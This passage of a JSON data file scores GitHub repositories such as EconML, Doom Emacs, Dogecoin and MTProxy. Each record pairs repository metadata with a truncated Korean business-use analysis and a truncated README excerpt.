Notebook","license":"NOASSERTION","abandonment_months":1,"description":"# EconML 저장소 분석\n\n## 왜 보물인가\n경제학 연구와 정책 결정에 필요한 복잡한 데이터 분석을 자동화할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 금융사, 보험사, 정부 부처가 구독하는 경제 데이터 분석 플랫폼\n2. **내부 업무 도구**: 대형 은행의 리스크 관리팀이 사용하는 예측 분석 시스템\n3. **API ","readme_excerpt":"[![Build status](https://github.com/py-why/EconML/actions/workflows/ci.yml/badge.svg)](https://github.com/py-why/EconML/actions/workflows/ci.yml)\n[![PyPI version](https://img.shields.io/pypi/v/econml.svg)](https://pypi.org/project/econml/)\n[![PyPI wheel](https://img.shields.io/pypi/wheel/econml.svg)](https://pypi.org/project/econml/)\n[![Supported Python versions](https://img.shields.io/pypi/pyversions/econml.svg)](https://pypi.org/project/econml/)\n\n<h1>\n<a href=\"https://www.pywhy.org/EconML/\">\n<img src=\"doc/econml-logo-icon.png\" width=\"80px\" align=\"left\" style=\"margin-right: 10px;\", alt=\"econml-logo\"> \n</a> EconML: A Python Package for ML-Based Heterogeneous Treatment Effects Estimation\n</h1>\n\n**EconML** is a Python package for estimating heterogeneous treatment effects from observational data via machine learning. This package was designed and built as part of the [ALICE project](https://www.microsoft.com/en-us/research/project/alice/) at Microsoft Research with the goal to combine st","composite_score":0.127,"license_safety_tag":"unknown"},{"name":"stems/join-monster","github_url":"https://github.com/stems/join-monster","stars":8,"language":"JavaScript","license":"mit","abandonment_months":10,"description":"# joins-monster 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 관계를 자동으로 정리해주는 기술로, 웹서비스의 성능을 대폭 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 관리 시스템(CRM)이나 프로젝트 관리 도구처럼 여러 정보가 연결된 웹 애플리케이션의 속도 개선\n2. **내부 업무 도구**: 대규모 직원","readme_excerpt":"<!-- Use fully qualified URL for the images so they'll also be visible from the NPM page too -->\n![join-monster](https://raw.githubusercontent.com/join-monster/join-monster/master/docs/img/join_monster.png)\n[![npm version](https://badge.fury.io/js/join-monster.svg)](https://badge.fury.io/js/join-monster) [![Build Status](https://travis-ci.org/join-monster/join-monster.svg?branch=master)](https://travis-ci.org/join-monster/join-monster) [![Documentation Status](https://readthedocs.org/projects/join-monster/badge/?version=latest)](http://join-monster.readthedocs.io/en/latest/?badge=latest)\n\n### Query Planning and Batch Data Fetching between GraphQL and SQL.\n\n- Read the Documentation: [latest](http://join-monster.readthedocs.io/en/latest/), [stable](https://join-monster.readthedocs.io/en/v3.3.5/)\n- Try Demo: [basic version](https://join-monster-demo.onrender.com/graphql?query=%257B%250A%2520%2520user%28id%253A%25202%29%2520%257B%250A%2520%2520%2520%2520fullName%250A%2520%2520%2520%2520ema","composite_score":0.1269,"license_safety_tag":"safe"},{"name":"hlissner/doom-emacs","github_url":"https://github.com/hlissner/doom-emacs","stars":14,"language":"Emacs Lisp","license":"mit","abandonment_months":0,"description":"# Doom Emacs 상용화 분석\n\n## 왜 보물인가\n프로그래머들이 일하는 방식을 근본적으로 바꾸는 빠르고 강력한 텍스트 편집 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발자 생산성 SaaS**: 클라우드 기반 코딩 환경에 Doom Emacs의 빠른 작업 방식을 통합하여 개발 속도를 높이는 구독 서비스\n2. **기업 내부 개발 도구**: 대규모 ","readme_excerpt":"<div align=\"center\">\n\n# Doom Emacs\n\n[Install](#install) • [Documentation] • [FAQ] • [Screenshots] • [Contribute](#contribute)\n\n![Made with Doom Emacs](https://img.shields.io/github/tag/doomemacs/doomemacs.svg?style=flat-square&label=release&color=58839b)\n![Supports Emacs 27.1–30.2](https://img.shields.io/badge/Supports-Emacs_27.1–30.2-blueviolet.svg?style=flat-square&logo=GNU%20Emacs&logoColor=white)\n![Latest commit](https://img.shields.io/github/last-commit/doomemacs/doomemacs?style=flat-square)\n<!-- ![Build status: master](https://img.shields.io/github/workflow/status/doomemacs/doomemacs/CI/master?style=flat-square) -->\n[![Discord Server](https://img.shields.io/discord/406534637242810369?color=738adb&label=Discord&logo=discord&logoColor=white&style=flat-square)][discord]\n[![Discussions board](https://img.shields.io/github/discussions/doomemacs/community?label=Discussions&logo=github&style=flat-square)][discuss]\n\n![Doom Emacs Screenshot](https://raw.githubusercontent.com/doomemacs/doo","composite_score":0.1266,"license_safety_tag":"safe"},{"name":"dogecoin/dogecoin","github_url":"https://github.com/dogecoin/dogecoin","stars":10,"language":"C++","license":"mit","abandonment_months":0,"description":"# Dogecoin 저장소 분석\n\n## 왜 보물인가\n도지코인은 암호화폐 생태계에서 가장 오래되고 커뮤니티 기반의 프로젝트로, 블록체인 기술에 관심 있는 개발자와 투자자들에게 학습 및 참고할 수 있는 실제 작동하는 코드베이스입니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소 서비스**: 도지코인 입출금 기능을 지원하는 유료 거래 플랫폼으로 운영\n2.","readme_excerpt":"<h1 align=\"center\">\n<img src=\"https://raw.githubusercontent.com/dogecoin/dogecoin/master/share/pixmaps/dogecoin256.svg\" alt=\"Dogecoin\" width=\"256\"/>\n<br/><br/>\nDogecoin Core [DOGE, Ð]  \n</h1>\n\n**IMPORTANT: Starting August 2024, the `master` branch has become the primary\nintegration branch and has become unstable. Please check out a tagged version\nbefore compiling production binaries.**\n\nFor internationalized documentation, see the index at [doc/intl](doc/intl/README.md).\n\nDogecoin is a community-driven cryptocurrency that was inspired by a Shiba Inu meme. The Dogecoin Core software allows anyone to operate a node in the Dogecoin blockchain networks and uses the Scrypt hashing method for Proof of Work. It is adapted from Bitcoin Core and other cryptocurrencies.\n\nFor information about the default fees used on the Dogecoin network, please\nrefer to the [fee recommendation](doc/fee-recommendation.md).\n\n## Usage 💻\n\nTo start your journey with Dogecoin Core, see the [installation guide](INSTAL","composite_score":0.1266,"license_safety_tag":"safe"},{"name":"ipfs/go-ipfs","github_url":"https://github.com/ipfs/go-ipfs","stars":6,"language":"Go","license":"NOASSERTION","abandonment_months":0,"description":"# go-ipfs 프로젝트 분석\n\n## 왜 보물인가\n인터넷의 중앙화된 구조를 탈피하여 누구나 데이터를 자유롭게 공유할 수 있는 새로운 네트워크 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **분산 파일 저장 SaaS**: 클라우드 저장소를 중앙 서버 없이 운영하는 서비스 (Dropbox의 탈중앙화 대안)\n2. **블록체인 기반 API**: NFT, 암호화폐","readme_excerpt":"<h1 align=\"center\">\n  <br>\n  <a href=\"https://github.com/ipfs/kubo/blob/master/docs/logo/\"><img src=\"https://user-images.githubusercontent.com/157609/250148884-d6d12db8-fdcf-4be3-8546-2550b69845d8.png\" alt=\"Kubo logo\" title=\"Kubo logo\" width=\"200\"></a>\n  <br>\n  Kubo: IPFS Implementation in Go\n  <br>\n</h1>\n\n<p align=\"center\" style=\"font-size: 1.2rem;\">The first implementation of IPFS.</p>\n\n<p align=\"center\">\n  <a href=\"https://ipfs.tech\"><img src=\"https://img.shields.io/badge/project-IPFS-blue.svg?style=flat-square\" alt=\"Official Part of IPFS Project\"></a>\n  <a href=\"https://discuss.ipfs.tech\"><img alt=\"Discourse Forum\" src=\"https://img.shields.io/discourse/posts?server=https%3A%2F%2Fdiscuss.ipfs.tech\"></a>\n  <a href=\"https://docs.ipfs.tech/community/\"><img alt=\"Matrix\" src=\"https://img.shields.io/matrix/ipfs-space%3Aipfs.io?server_fqdn=matrix.org\"></a>\n  <a href=\"https://github.com/ipfs/kubo/actions\"><img src=\"https://img.shields.io/github/actions/workflow/status/ipfs/kubo/gobuild.yml?","composite_score":0.1264,"license_safety_tag":"unknown"},{"name":"jaagr/polybar","github_url":"https://github.com/jaagr/polybar","stars":7,"language":"C++","license":"mit","abandonment_months":8,"description":"# jaagr/polybar 분석\n\n## 왜 보물인가\nLinux 컴퓨터의 화면 상단/하단에 시간, 날씨, 배터리 등 유용한 정보를 표시해주는 맞춤형 상태표시줄 만드는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS**: Linux 데스크톱 환경 최적화 서비스로 사용자 맞춤 대시보드 구독 제공\n2. **내부 업무 도구**: IT 부서에서 서버 모니터","readme_excerpt":"<p align=\"center\">\n  <img src=\"doc/_static/banner.png#gh-light-mode-only\" alt=\"Polybar\">\n  <img src=\"doc/_static/banner-dark-mode.png#gh-dark-mode-only\" alt=\"Polybar\">\n</p>\n\n<p align=\"center\">\nA fast and easy-to-use tool for creating status bars.\n</p>\n\n<p align=\"center\">\n<a href=\"https://github.com/polybar/polybar/releases\"><img src=\"https://img.shields.io/github/release/polybar/polybar.svg\"></a>\n<a href=\"https://github.com/polybar/polybar/releases\"><img alt=\"GitHub All Releases\" src=\"https://img.shields.io/github/downloads/polybar/polybar/total\" /></a>\n<a href=\"https://github.com/polybar/polybar/actions?query=workflow%3ACI\"><img src=\"https://github.com/polybar/polybar/workflows/CI/badge.svg\"></a>\n<a href=\"https://github.com/polybar/polybar/actions?query=workflow%3A%22Release+Workflow%22\"><img src=\"https://github.com/polybar/polybar/workflows/Release%20Workflow/badge.svg\"></a>\n<a href=\"https://polybar.readthedocs.io\"><img src=\"https://readthedocs.org/projects/polybar/badge/?version=lat","composite_score":0.1263,"license_safety_tag":"safe"},{"name":"epicmaxco/vuestic-admin","github_url":"https://github.com/epicmaxco/vuestic-admin","stars":5,"language":"Vue","license":"mit","abandonment_months":3,"description":"# Vuestic Admin 상업화 분석\n\n## 왜 보물인가\n기업의 관리자용 대시보드를 빠르게 만들 수 있는 완성도 높은 템플릿으로, 개발 시간을 대폭 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회계 소프트웨어, 마케팅 자동화 도구 등의 관리 화면 제공\n- **내부 업무 도구**: 중소기업의 재고 관리, 직원 근무 시스템,","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://vuestic.dev\" target=\"_blank\">\n    <img alt=\"Vuestic UI Logo\" width=\"220\" src=\"./.github/assets/vuestic-admin-logo.png\">\n  </a>\n</p>\n\n<p align=\"center\">\n  Free and beautiful Admin Template utilizing Vue 3, Vite, Pinia, and Tailwind CSS. Designed for building efficient, responsive, and fast-loading admin interfaces.</br>\n  Developed by  <a href=\"https://epicmax.co\">Epicmax</a>.</br>\n  Based on <a href=\"https://ui.vuestic.dev\">Vuestic UI</a> library.\n</p>\n\n<p align=\"center\">\n  <a href=\"https://admin-demo.vuestic.dev\"> Live Demo </a> |\n  <a href=\"https://admin.vuestic.dev/\"> About Vuestic Admin </a> |\n  <a href=\"https://ui.vuestic.dev/\">Vuestic UI documentation</a>\n</p>\n\n> Vuestic Admin is built with [Vuestic UI](https://ui.vuestic.dev). See our\n> <a href=\"https://github.com/epicmaxco/vuestic-ui/issues\">issues</a>,\n> <a href=\"https://ui.vuestic.dev/en/contribution/guide\">contributing guide</a> and join discussions on our\n> <a href=\"https://discord.gg/j","composite_score":0.1262,"license_safety_tag":"safe"},{"name":"andersao/l5-repository","github_url":"https://github.com/andersao/l5-repository","stars":8,"language":"PHP","license":"mit","abandonment_months":8,"description":"# andersao/l5-repository 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 데이터를 체계적으로 정리하고 관리하는 작업을 자동화해주는 도구로, 개발자의 반복적인 수작업을 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 플랫폼**: 상품 정보, 주문, 고객 데이터를 자동으로 분류하고 저장하는 백엔드 시스템\n2. **업무 관리 SaaS**","readme_excerpt":"# Laravel 5 Repositories\n\nLaravel 5 Repositories is used to abstract the data layer, making our application more flexible to maintain.\n\n[![Latest Stable Version](https://poser.pugx.org/prettus/l5-repository/v/stable)](https://packagist.org/packages/prettus/l5-repository) [![Total Downloads](https://poser.pugx.org/prettus/l5-repository/downloads)](https://packagist.org/packages/prettus/l5-repository) [![Latest Unstable Version](https://poser.pugx.org/prettus/l5-repository/v/unstable)](https://packagist.org/packages/prettus/l5-repository) [![License](https://poser.pugx.org/prettus/l5-repository/license)](https://packagist.org/packages/prettus/l5-repository)\n[![Analytics](https://ga-beacon.appspot.com/UA-61050740-1/l5-repository/readme)](https://packagist.org/packages/prettus/l5-repository)\n[![Code Climate](https://codeclimate.com/github/andersao/l5-repository/badges/gpa.svg)](https://codeclimate.com/github/andersao/l5-repository)\n\n#### See versions: [1.0.*](https://github.com/andersao/l5","composite_score":0.1261,"license_safety_tag":"safe"},{"name":"jessarcher/dotfiles","github_url":"https://github.com/jessarcher/dotfiles","stars":19,"language":"Lua","license":"mit","abandonment_months":6,"description":"# jessarcher/dotfiles 분석\n\n## 왜 보물인가\n컴퓨터를 더 편하게 쓰기 위한 개인 설정 모음으로, 다른 사람들이 이를 따라하며 자신의 작업 환경을 빠르게 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발자 온보딩 도구 SaaS**\n새로운 팀원들이 회사 표준 개발 환경을 자동으로 설치하도록 하는 구독 서비스로 운영할 수 있습니","readme_excerpt":"# dotfiles\nHome sweet home\n","composite_score":0.1258,"license_safety_tag":"safe"},{"name":"flashlight/wav2letter","github_url":"https://github.com/flashlight/wav2letter","stars":6,"language":"C++","license":"NOASSERTION","abandonment_months":4,"description":"# flashlight/wav2letter 기술 자산 분석\n\n## 왜 보물인가\n음성을 텍스트로 변환하는 기술로, 음성 명령 서비스나 자동 자막 생성 등 다양한 실생활 애플리케이션을 만드는 기초가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음성 받아쓰기 SaaS**: 회의록 자동 기록, 의료 기록 자동 작성 등 음성을 텍스트로 변환하는 구독 서비스","readme_excerpt":"# wav2letter++\n\n[![CircleCI](https://circleci.com/gh/flashlight/wav2letter.svg?style=svg)](https://app.circleci.com/pipelines/github/flashlight/wav2letter)\n[![Join the chat at https://gitter.im/wav2letter/community](https://badges.gitter.im/wav2letter/community.svg)](https://gitter.im/wav2letter/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n## Important Note:\n### wav2letter has been moved and consolidated [into Flashlight](https://github.com/flashlight/flashlight) in the [ASR application](https://github.com/flashlight/flashlight/tree/master/flashlight/app/asr).\n\nFuture wav2letter development will occur in Flashlight.\n\n*To build the old, pre-consolidation version of wav2letter*, checkout the [wav2letter v0.2](https://github.com/flashlight/wav2letter/releases/tag/v0.2) release, which depends on the old [Flashlight v0.2](https://github.com/flashlight/flashlight/releases/tag/v0.2) release. The [`wav2letter-lua`](https://github.com/flashlight/wav2lett","composite_score":0.1254,"license_safety_tag":"unknown"},{"name":"shengxinjing/programmer-job-blacklist","github_url":"https://github.com/shengxinjing/programmer-job-blacklist","stars":5,"language":"Shell","license":"mit","abandonment_months":3,"description":"# Programmer Job Blacklist 분석\n\n## 왜 보물인가\n프로그래머들이 공유하는 문제 기업 정보를 모아서 취업 사기나 나쁜 근무 환경을 미리 피할 수 있는 커뮤니티 데이터베이스입니다.\n\n## 어디에 쓸 수 있나\n\n1. **구인 플랫폼 서비스**: 채용공고 페이지에 \"회사 평판 점수\" 뱃지를 붙여서 구직자들이 신뢰도 높은 회사를 쉽게 찾을 수","readme_excerpt":"# 程序员找工作黑名单\n\n:snail:我也只是围观群众，背后的真相大家自己判断，我只是单纯的收藏一些链接，不喜勿喷，欢迎大家关注我[微博](http://weibo.com/woniuppp)和提 [issues](https://github.com/shengxinjing/programmer-job-blacklist/issues) 来参与维护这个名单\n\n\n最近的事情 让我意识到 有些同行也是劣迹斑斑，需要记录一下 以后大家招聘注意\n\n\n\n### 写在前面\n\n谢谢 [issues](https://github.com/shengxinjing/programmer-job-blacklist/issues/20) 提醒\n\n首先，每一个程序猿，每一个公司都有黑点，但是如果把黑点放大了，黑名单就没存在的意义了。就拿这几个例子来吧\n\n1. 世纪佳缘认为白帽子，是违法的\n    * 虽然这件事是我怒开 repo 的[起因](https://www.zhihu.com/question/47775182)，但是他没有拖欠员工工资或不付工资\n\n2. 与创始人说的股份，那是个人争取的事\n    * 也没拖欠工资或不付工资\n    * 只是记住以后记得留个心眼，和合伙人不是只写代码就可以的\n3. 华为清理 34 岁以上员工，也是按照合同裁员，给赔偿\n    * 大公司更新换代，裁员没有任何问题，不裁员的公司早晚倒闭\n    * 华为也没有拖欠工资\n    * 只是我个人觉得，因为这件事，不想去华为工作 仅此而已，害怕到了34就被干掉\n4. 有些事情，应该被记住\n\n\n\n\n### 程序员黑名单\n* [如何看待摩拜前端负责人小春（张耀春）疑似性骚扰女下属？](https://www.zhihu.com/question/289146339?from=groupmessage&isappinstalled=0&utm_medium=social&utm_oi=581028265741783040&utm_source=wechat_session)\n\n### 普通程序员\n\n* 杭州有赞\n    - [如何看待“有赞”年会公开宣布996工作制？](https://www.zhihu.com/question/309428750)\n    - [有赞会得到法律的惩罚吗？](htt","composite_score":0.1253,"license_safety_tag":"safe"},{"name":"apple/swift-atomics","github_url":"https://github.com/apple/swift-atomics","stars":9,"language":"Swift","license":"apache-2.0","abandonment_months":6,"description":"# Apple Swift-Atomics 상용화 분석\n\n## 왜 보물인가\niPhone 앱부터 서버까지 Apple이 만드는 소프트웨어에서 여러 작업을 동시에 안전하게 처리하기 위한 핵심 기술로, 수백만 개 앱의 성능을 결정하는 기초 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **금융 거래 플랫폼**: 수천 명이 동시에 주식을 사고팔 때 계좌 잔액이 꼬이지 않","readme_excerpt":"# Swift Atomics ⚛︎︎\n\n[SE-0282]: https://github.com/swiftlang/swift-evolution/blob/main/proposals/0282-atomics.md\n[SE-0282r0]: https://github.com/swiftlang/swift-evolution/blob/3a358a07e878a58bec256639d2beb48461fc3177/proposals/0282-atomics.md\n\nThis package implements an atomics library for Swift, providing atomic operations for a variety of Swift types, including integers and pointer values. The goal is to enable intrepid developers to start building synchronization constructs directly in Swift. \n\nAtomic operations aren't subject to the usual exclusivity rules. The same memory location may be safely read and updated from multiple concurrent threads of execution, as long as all such access is done through atomic operations. For example, here is a trivial atomic counter:\n\n``` swift\nimport Atomics\nimport Dispatch\n\nlet counter = ManagedAtomic<Int>(0)\n\nDispatchQueue.concurrentPerform(iterations: 10) { _ in\n  for _ in 0 ..< 1_000_000 {\n    counter.wrappingIncrement(ordering: .relaxed)\n  }\n}\n","composite_score":0.1251,"license_safety_tag":"safe"},{"name":"Flutterando/modular","github_url":"https://github.com/Flutterando/modular","stars":8,"language":"Dart","license":"NOASSERTION","abandonment_months":6,"description":"# Flutterando/modular 분석 리포트\n\n## 왜 보물인가\nFlutter 앱 개발을 더 체계적이고 효율적으로 관리할 수 있게 해주는 구조화 도구로, 개발팀의 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 모바일 앱 개발 플랫폼 (SaaS)**\n- 중소 개발사들이 앱을 더 빠르게 만들 수 있도록 돕는 클라우드 기반 개발 ","readme_excerpt":"<a name=\"readme-top\"></a>\n\n<!--\n*** This template was base on othneildrew's Best-README-Template. If you have a suggestion that would make this better, please fork the repo and create a pull request if it's for the template as whole. \n\nIf it's for the Flutterando version of the template just send a message to us (our contacts are below)\n\n*** Don't forget to give his project a star, he deserves it!\n*** Thanks for your support! \n-->\n\n\n  <h1 align=\"center\">Flutter Modular</h1>\n\n\n<!-- PROJECT LOGO -->\n<br />\n<div align=\"center\">\n  <a href=\"https://github.com/othneildrew/Best-README-Template\">\n    <img src=\"https://raw.githubusercontent.com/Flutterando/modular/master/flutter_modular.png\" alt=\"Logo\" width=\"170\" style=\" padding-right: 30px;\">\n  </a>\n  <a href=\"https://github.com/Flutterando/README-Template/\">\n    <img src=\"https://raw.githubusercontent.com/Flutterando/README-Template/master/readme_assets/logo-flutterando.png\" alt=\"Logo\" width=\"95\">\n  </a>\n\n  <br />\n  <p align=\"center\">\n    We","composite_score":0.1249,"license_safety_tag":"unknown"},{"name":"netlify/netlify-cms","github_url":"https://github.com/netlify/netlify-cms","stars":5,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# Netlify CMS 저장소 분석\n\n## 왜 보물인가\n웹사이트 글이나 이미지를 코딩 없이 간단하게 관리할 수 있는 도구로, 블로그나 소식지를 운영하는 사람들의 업무를 획기적으로 단순화합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS**: 웹사이트 관리 서비스 - 콘텐츠 작성자가 프로그래머의 도움 없이 자신의 웹사이트를 직접 수정할 수 있는 편집 화면","readme_excerpt":"<p align=\"center\">\n  <img src=\"/img/decap.svg\" alt=\"Decap CMS\" width=\"260\" />\n</p>\n\n<p align=\"center\"><strong>Documentation: <a href=\"https://www.decapcms.org/\">decapcms.org</a></strong></p>\n\n[![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/decaporg/decap-cms/blob/main/LICENSE) [![Netlify Status](https://api.netlify.com/api/v1/badges/8b87160b-0a11-4f75-8050-1d21bc1cff8c/deploy-status)](https://app.netlify.com/sites/decap-www/deploys) [![npm version](https://img.shields.io/npm/v/decap-cms.svg?style=flat)](https://www.npmjs.com/package/decap-cms) [![Build Status](https://github.com/decaporg/decap-cms/workflows/Node%20CI/badge.svg)](https://github.com/decaporg/decap-cms/actions?query=branch%3Amain+workflow%3A%22Node+CI%22) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/decaporg/decap-cms/blob/main/CONTRIBUTING.md)\n\nA CMS for static site generators. Give teams a simple way to edit and add content to any","composite_score":0.1248,"license_safety_tag":"safe"},{"name":"MilesCranmer/PySR","github_url":"https://github.com/MilesCranmer/PySR","stars":12,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# PySR 사업화 분석\n\n## 왜 보물인가\n수학 공식을 자동으로 찾아내는 AI 기술로, 복잡한 데이터 분석을 누구나 쉽게 할 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 제약사·화학회사를 위한 \"실험 데이터 자동 분석 플랫폼\" - 실험 결과를 올리면 숨겨진 규칙을 자동 발견\n2. **내부 업무 도구**: 제조업체의 \"","readme_excerpt":"[//]: # (Logo:)\n\n<div align=\"center\">\n\nPySR searches for symbolic expressions which optimize a particular objective.\n\nhttps://github.com/MilesCranmer/PySR/assets/7593028/c8511a49-b408-488f-8f18-b1749078268f\n\n\n# PySR: High-Performance Symbolic Regression in Python and Julia\n\n| **Docs** | **Forums** | **Paper** | **colab demo** |\n|:---:|:---:|:---:|:---:|\n|[![Documentation](https://github.com/MilesCranmer/PySR/actions/workflows/docs.yml/badge.svg)](https://ai.damtp.cam.ac.uk/pysr/)|[![Discussions](https://img.shields.io/badge/discussions-github-informational)](https://github.com/MilesCranmer/PySR/discussions)|[![Paper](https://img.shields.io/badge/arXiv-2305.01582-b31b1b)](https://arxiv.org/abs/2305.01582)|[![Colab](https://img.shields.io/badge/colab-notebook-yellow)](https://colab.research.google.com/github/MilesCranmer/PySR/blob/master/examples/pysr_demo.ipynb)|\n\n| **pip** | **conda** | **Stats** |\n| :---: | :---: | :---: |\n|[![PyPI version](https://badge.fury.io/py/pysr.svg)](https://","composite_score":0.1248,"license_safety_tag":"safe"},{"name":"magicblack/maccms_down","github_url":"https://github.com/magicblack/maccms_down","stars":5,"language":"","license":"NOASSERTION","abandonment_months":6,"description":"# magicblack/maccms_down 분석\n\n## 왜 보물인가\n온라인 영상 콘텐츠를 자동으로 수집하고 정리하는 도구로, 영상 서비스 운영자들이 수작업으로 하던 콘텐츠 관리 시간을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **영상 스트리밍 플랫폼**: 드라마, 영화 등 콘텐츠를 자동으로 수집하여 서비스 초기 구성\n- **내부 영상 아카이","readme_excerpt":"# 免责声明\n本程序仅供内部学习和交流使用，没有内置任何数据，请在遵守当地法律的前提下使用本站程序，对用户在使用过程中的自行维护的信息内容本站不负任何责任！\n\nThis program is for internal learning and communication use only, there is no built-in data, please comply with local laws under the premise of using the site program, the user in the process of self-maintenance of the information content of this site is not responsible!\n\n# 简单介绍\n苹果CMS各种程序压缩包打包下载！方便新手使用！最新完整程序包+更新包！\n\nApple CMS compression package package download! Easy to use for beginners! The latest complete package + update package!\n\n\n# 下载直链\n全部打包\n\nhttps://github.com/magicblack/maccms_down/archive/master.zip\nhttps://hub.fastgit.org/magicblack/maccms_down/archive/refs/heads/master.zip\n\n第三方CDN加速下载\n\nhttps://hub.fastgit.org/magicblack/maccms_down\nhttps://cdn.jsdelivr.net/gh/magicblack/maccms_down/\n\n\n内容管理系统v10完整包\n\nhttps://raw.githubusercontent.com/magicblack/maccms_down/master/maccms10.zip\nhttps://hub.fastgit.org/magicblack/maccms_down/raw/master/maccms10.zip\n\n内容管理系统v10更新包\n\nhttps://raw.githubusercontent.com/mag","composite_score":0.1247,"license_safety_tag":"unknown"},{"name":"bbatsov/rubocop","github_url":"https://github.com/bbatsov/rubocop","stars":5,"language":"Ruby","license":"mit","abandonment_months":0,"description":"# RuboCop 상용화 분석\n\n## 왜 보물인가\n루비 프로그래밍 언어로 작성된 코드의 품질을 자동으로 검사하고 개선해주는 도구로, 소프트웨어 개발 회사들이 코드 실수를 줄이고 생산성을 높이는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 코드 품질 검사 플랫폼**\n- GitHub, GitLab 연동하여 개발자들의 코드를 자동 검","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/rubocop/rubocop/master/logo/rubo-logo-horizontal-white.png\" alt=\"RuboCop Logo\"/>\n</p>\n\n----------\n[![Ruby Style Guide](https://img.shields.io/badge/code_style-rubocop-brightgreen.svg)](https://github.com/rubocop/rubocop)\n[![Gem Version](https://badge.fury.io/rb/rubocop.svg)](https://badge.fury.io/rb/rubocop)\n[![CI](https://github.com/rubocop/rubocop/actions/workflows/rubocop.yml/badge.svg)](https://github.com/rubocop/rubocop/actions/workflows/rubocop.yml)\n[![Discord](https://img.shields.io/badge/chat-on%20discord-7289da.svg?sanitize=true)](https://discord.gg/wJjWvGRDmm)\n\n> Role models are important. <br/>\n> -- Officer Alex J. Murphy / RoboCop\n\n**RuboCop** is a Ruby static code analyzer (a.k.a. `linter`) and code formatter. Out of the box it\nwill enforce many of the guidelines outlined in the community [Ruby Style\nGuide](https://rubystyle.guide). Apart from reporting the problems discovered in your code,\nRuboCop can also a","composite_score":0.1246,"license_safety_tag":"safe"},{"name":"TelegramMessenger/MTProxy","github_url":"https://github.com/TelegramMessenger/MTProxy","stars":5,"language":"C","license":"unknown","abandonment_months":7,"description":"# MTProxy 상용화 분석 보고서\n\n## 왜 보물인가\n텔레그램이 공식 제공하는 메시지 전송 중개 기술로, 인터넷 검열이 심한 지역에서도 안전한 통신을 가능하게 하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **통신 자유화 SaaS**: 검열된 국가의 사용자들을 위한 우회 서비스로 월 구독료 수집\n2. **기업 내부 도구**: 보안이 중요한 조","readme_excerpt":"# MTProxy\nSimple MT-Proto proxy\n\n## Building\nInstall dependencies, you would need common set of tools for building from source, and development packages for `openssl` and `zlib`.\n\nOn Debian/Ubuntu:\n```bash\napt install git curl build-essential libssl-dev zlib1g-dev\n```\nOn CentOS/RHEL:\n```bash\nyum install openssl-devel zlib-devel\nyum groupinstall \"Development Tools\"\n```\n\nClone the repo:\n```bash\ngit clone https://github.com/TelegramMessenger/MTProxy\ncd MTProxy\n```\n\nTo build, simply run `make`, the binary will be in `objs/bin/mtproto-proxy`:\n\n```bash\nmake && cd objs/bin\n```\n\nIf the build has failed, you should run `make clean` before building it again.\n\n## Running\n1. Obtain a secret, used to connect to telegram servers.\n```bash\ncurl -s https://core.telegram.org/getProxySecret -o proxy-secret\n```\n2. Obtain current telegram configuration. It can change (occasionally), so we encourage you to update it once per day.\n```bash\ncurl -s https://core.telegram.org/getProxyConfig -o proxy-multi.conf\n`","composite_score":0.1245,"license_safety_tag":"unknown"},{"name":"ng-bootstrap/ng-bootstrap","github_url":"https://github.com/ng-bootstrap/ng-bootstrap","stars":9,"language":"TypeScript","license":"mit","abandonment_months":5,"description":"# ng-bootstrap/ng-bootstrap 분석 리포트\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 버튼, 메뉴, 팝업 같은 기본 부품들을 미리 만들어 놓은 도구 모음으로, 개발자들이 같은 것을 반복해서 만드는 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 전자상거래 플랫폼이나 프로젝트 관리 도구처럼 버튼과","readme_excerpt":"# NG Bootstrap - Angular-powered Bootstrap widgets\n\n[![npm version](https://badge.fury.io/js/%40ng-bootstrap%2Fng-bootstrap.svg)](https://badge.fury.io/js/%40ng-bootstrap%2Fng-bootstrap)\n[![Build Status](https://github.com/ng-bootstrap/ng-bootstrap/actions/workflows/ci.yml/badge.svg?branch=master)](https://github.com/ng-bootstrap/ng-bootstrap/actions)\n[![codecov](https://codecov.io/gh/ng-bootstrap/ng-bootstrap/branch/master/graph/badge.svg)](https://codecov.io/gh/ng-bootstrap/ng-bootstrap)\n\n[Angular](https://angular.dev/) widgets built from the ground up using only [Bootstrap 5](https://getbootstrap.com/) CSS with APIs designed for the Angular ecosystem.\n\nPlease check our [demo site](https://ng-bootstrap.github.io) and the list of\n[issues](https://github.com/ng-bootstrap/ng-bootstrap/issues) to see all the things we are working on. Feel free to make comments there.\n\n## Table of Contents\n\n- [Demo](#demo)\n- [Dependencies](#dependencies)\n- [Installation](#installation)\n- [Supported 